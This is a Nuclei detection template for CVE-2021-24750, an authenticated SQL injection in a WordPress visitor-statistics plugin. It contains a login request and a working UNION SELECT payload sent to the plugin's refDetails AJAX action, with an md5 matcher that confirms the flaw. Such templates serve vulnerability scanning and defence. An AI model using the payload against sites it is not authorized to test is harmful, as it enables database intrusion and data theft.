nuclei-templates/http/cves/2021/CVE-2021-24750.yaml

55 lines
1.9 KiB
YAML

id: CVE-2021-24750
info:
name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
author: cckuakilong
severity: high
description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
- https://plugins.trac.wordpress.org/changeset/2622268
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
epss-score: 0.00776
cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
framework: wordpress
vendor: wp_visitor_statistics_\(real_time_traffic\)_project
product: wp_visitor_statistics_\(real_time_traffic\)
tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin
variables:
num: "999999999"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200